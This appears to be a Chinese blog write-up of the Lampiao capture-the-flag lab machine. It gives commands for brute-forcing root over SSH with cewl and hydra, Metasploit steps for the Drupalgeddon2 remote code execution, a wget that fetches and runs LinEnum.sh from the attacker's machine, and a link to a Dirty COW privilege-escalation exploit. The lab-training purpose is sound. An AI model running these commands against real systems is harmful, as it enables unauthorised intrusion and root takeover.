Lampiao（dirtycow） - whale3070's blog

info

1
2
3

22/tcp open  ssh OpenSSH 6.6.1p1 Ubuntu
80/tcp open  http
OS details: Linux 3.2 - 4.8

关于80端口，肯定有防火墙之类的东东==

dirbuster、nikto、nmap、unicornscan找不到任何信息。除了浏览器直接访问80端口，返回了一个页面，It’s easy，个鬼啊！！！

最神奇的是只要burp一挂代理，目标机就没有响应了，一关代理，就返回It’s easy的页面。感觉好像被靶机作者调戏了。

em…应该是连接80端口，就会发送回这个字符画。

我不想爆破ssh了，看wp吧==
看大佬表演。。

思路一（爆破ssh）

用nmap -p- -Pn -vv ip 扫描将近一个小时，65535个端口，可以发现1898端口开放。
根据这个端口生成一个字典，hydra爆破即可获得shell。
dirtycow exp运行一下，即可得到root权限。

cewl -w dict.txt http://192.168.11.131:1898/?q=node/1
hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.1.133 ssh

好无聊，爆破什么的没有美感~~

思路二（cms漏洞命令执行）

1898-http

该端口开放http服务，页面下方显示drupal
robots.txt提示了，http://ip:1898/CHANGELOG.txt
更新版本为Drupal 7.54

查找可用exploit

Drupal < 7.58 - ‘Drupalgeddon3’ Remote Code

msfconsole
search drupal
use exploit/unix/webapp/drupal_drupalgeddon2
show options
set RHOST ip
set RPORT 1898
run
shell

msf导入载荷

在用metasploit找不到可用漏洞的模块情况下，可以在https://www.exploit‐db.com/ 上搜索并保
存。
然后在/root/.msf4/modules/exploits/ 目录下新建一个自定义目录，并在该目录下存放你的msf
模块。
例如，新建/root/.msf4/modules/exploits/new ,并在该目录下存放1234.rb模块。

寻找可用exp的bash脚本

LinEnum.sh，用这个提权脚本搜集可用信息。

kali执行：
#python -m SimpleHTTPServer
----------------
反弹shell执行：
cd /tmp
wget http://192.168.1.128:8000/LinEnum.sh
chmod a+x LinEnum.sh
./LinEnum.sh > log.txt

运行了提权检查脚本以后，发现输出实在太多了，而且多数是没有什么意义的输出，例如error,xxxx

如果是我来设计提权脚本，我尝试了99种，失败了98种提权尝试，那么我会输出一种可能的提权方式，而不是98失败+1成功。

linux-exploit-suggester.sh

dirty cow,exp :https://www.exploit-db.com/download/40847.cpp

training

training cms

owasp渗透测试指南读后感 Previous

Mr-robots(escalation privilege) Next